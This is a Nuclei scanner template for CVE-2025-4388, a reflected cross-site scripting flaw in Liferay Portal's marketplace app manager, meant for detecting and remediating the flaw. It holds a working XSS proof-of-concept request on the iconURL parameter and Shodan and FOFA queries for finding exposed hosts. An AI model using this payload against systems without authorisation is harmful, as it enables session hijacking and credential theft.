id: CVE-2025-4388 info: name: Liferay Portal - Cross-Site Scripting author: iamnoooob,rootxharsh,pdresearch severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in the Liferay Portal 7.4.0 through 7.4.3.131, and Liferay DXP 2024.Q4.0 through 2024.Q4.5, 2024.Q3.1 through 2024.Q3.13, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, 7.4 GA through update 92 allows an remote non-authenticated attacker to inject JavaScript into the modules/apps/marketplace/marketplace-app-manager-web. impact: | Attackers can execute arbitrary JavaScript in victim browsers through the iconURL parameter in the marketplace app manager, potentially leading to session hijacking and credential theft. remediation: | Upgrade Liferay Portal or DXP to the latest patched version that properly sanitizes the iconURL parameter. reference: - https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-4388 - https://nvd.nist.gov/vuln/detail/CVE-2025-4388 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2025-4388 cwe-id: CWE-79 epss-score: 0.25059 epss-percentile: 0.96279 metadata: verified: true max-request: 1 shodan-query: html:"liferayPortalCSS" fofa-query: body="liferayPortalCSS" tags: cve,cve2025,liferay,marketplace,xss,vuln http: - method: GET path: - "{{BaseURL}}/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E" matchers-condition: and matchers: - type: word part: body words: - 'sticker sticker-' - '

' condition: and - type: word part: content_type words: - text/html - type: status status: - 200 # digest: 4a0a00473045022100ad670209df6ea1df7142e45522fa7c0b92010231bdb4e9b5ca45275e21b117830220549608ef5a3971a0592054fbaa23b9faf92708fbc76b3310dd3526065f4bd68d:922c64590222798bb761d5b6d8e72950